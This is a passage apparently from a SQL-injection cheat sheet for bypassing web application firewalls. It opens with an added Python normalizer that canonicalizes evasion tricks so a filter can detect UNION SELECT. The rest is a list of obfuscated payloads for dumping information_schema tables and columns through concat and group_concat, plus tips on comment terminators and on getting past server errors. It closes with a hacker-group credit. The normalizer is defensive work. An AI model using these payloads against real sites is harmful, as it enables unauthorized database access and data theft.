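What a filter has to do before any of the union/select signatures above are worth matching, covering both this list and the earlier "[+] Union Select" list, as an added example that is not from the sheet: a defender-side normalizer that undoes the layers the variants rely on (percent-encoding and double encoding, `/**/` and `/*!NNNNN ... */` comments, `#` and `-- ` line comments, MySQL's extra whitespace characters, `0x..` string literals) and then applies one plain signature to the result. The signature and the sample payloads in the demo are this example's own.

```python
"""Canonicalize WAF-evasion SQL fragments to what MySQL's lexer parses."""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

MYSQL_SPACE = "\t\n\x0b\x0c\r \xa0"          # what the lexer accepts as a separator
SPACE_RUN = re.compile("[\t\n\x0b\x0c\r \xa0]+")
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")
UNION_SELECT = re.compile(r"\bunion\s*(?:(?:all|distinct|distinctrow)\s+)?\(?\s*select\b")


def url_decode_fully(s: str, max_rounds: int = 3) -> str:
    """unquote_plus until the text stops changing: %2520 -> %20 -> ' '.
    latin-1 keeps lone high bytes such as %a0 instead of turning them into U+FFFD."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    return s


def strip_comments(s: str) -> str:
    """One pass with MySQL's comment rules:
      /* ... */           removed (replaced by a space)
      /*!NNNNN body */    only the delimiters go, the body is kept and may
                          itself contain /* */ comments
      # ... and -- ...    removed to end of line
    """
    out: list[str] = []
    i, n, version_depth = 0, len(s), 0
    while i < n:
        if s.startswith("/*!", i):
            i += 3
            while i < n and s[i].isdigit():      # optional version number
                i += 1
            version_depth += 1
            out.append(" ")
        elif s.startswith("/*", i):
            end = s.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
        elif version_depth and s.startswith("*/", i):
            version_depth -= 1
            i += 2
            out.append(" ")
        elif s[i] == "#" or (s.startswith("--", i) and (i + 2 == n or s[i + 2] in MYSQL_SPACE)):
            end = s.find("\n", i)
            i = n if end < 0 else end
            out.append("\n")
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_hex_literals(s: str) -> str:
    """0x3c62723e -> '<br>' so string constants become readable and matchable."""
    def repl(m: re.Match) -> str:
        return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"
    return HEX_LITERAL.sub(repl, s)


def normalize(fragment: str) -> str:
    s = url_decode_fully(fragment)
    s = s.replace("\x00", "")            # %00 tricks: the NUL must not split a keyword
    s = strip_comments(s)
    s = decode_hex_literals(s)
    return SPACE_RUN.sub(" ", s).strip().lower()


def is_union_select(fragment: str) -> bool:
    return UNION_SELECT.search(normalize(fragment)) is not None


if __name__ == "__main__":
    samples = [                                  # constructed, in the style of the lists above
        "/*!50000%55nIoN*/+/*!50000%53eLeCt*/+1,2,3",
        "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2",
        "uNioN (/*!/**/ SeleCT */ 11)",
        "0%a0union%a0select%09concat(0x3c62723e,/*!TabLe_NaMe*/)",
        "+uni%0bon+se%0blect+",                  # a separator inside the word splits the token
    ]
    for p in samples:
        print(f"{is_union_select(p)!s:5}  {normalize(p)}")
```

Two families in the list are deliberately outside this normalizer's reach. `uniUNIONon`/`selSELECTect` and `un/**/ion` only work against a filter that deletes the keyword or comment once and passes the remainder; the fix there is to reject rather than strip. And `uni%0bon` is reported as not a UNION because the vertical tab really does split the token for MySQL as well, so a normalizer that declared it one would be flagging noise.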

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=0x<hex of table name>

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like 0x<hex of table name>

[~] concat() [~]

CoNcAt()

concat()

CON%08CAT()

CoNcAt()

%0AcOnCat()

/**//*!12345cOnCat*/

/*!50000cOnCat*/(/*!*/)

unhex(hex(concat(table_name)))

unhex(hex(/*!12345concat*/(table_name)))

unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)

CONVERT(group_concat(table_name)+USING+latin2)

CONVERT(group_concat(table_name)+USING+latin3)

CONVERT(group_concat(table_name)+USING+latin4)

CONVERT(group_concat(table_name)+USING+latin5)

[~] after id no. like id=1 +/*!and*/+1=0 [~]

+div+0

Having+1=0

+AND+1=0

+/*!and*/+1=0

and(1)=(0)

When --+- or -- does not work as the comment terminator, use ;%00

Bypass server errors

Sometimes a UNION SELECT makes the site answer with a server error (the sheet says 505) or time out.

Bypass:

- use brackets

union(select+1)

- use %0b or /**/ instead of a space

union%0bselect
Hacked by You From Team Name Hacked By Mysterious Coder From Innominate ।

https://www.facebook.com/innominate.official

https://www.facebook.com/groups/1060843833941377

https://www.facebook.com/groups/

www.facebook.com/100004445461825
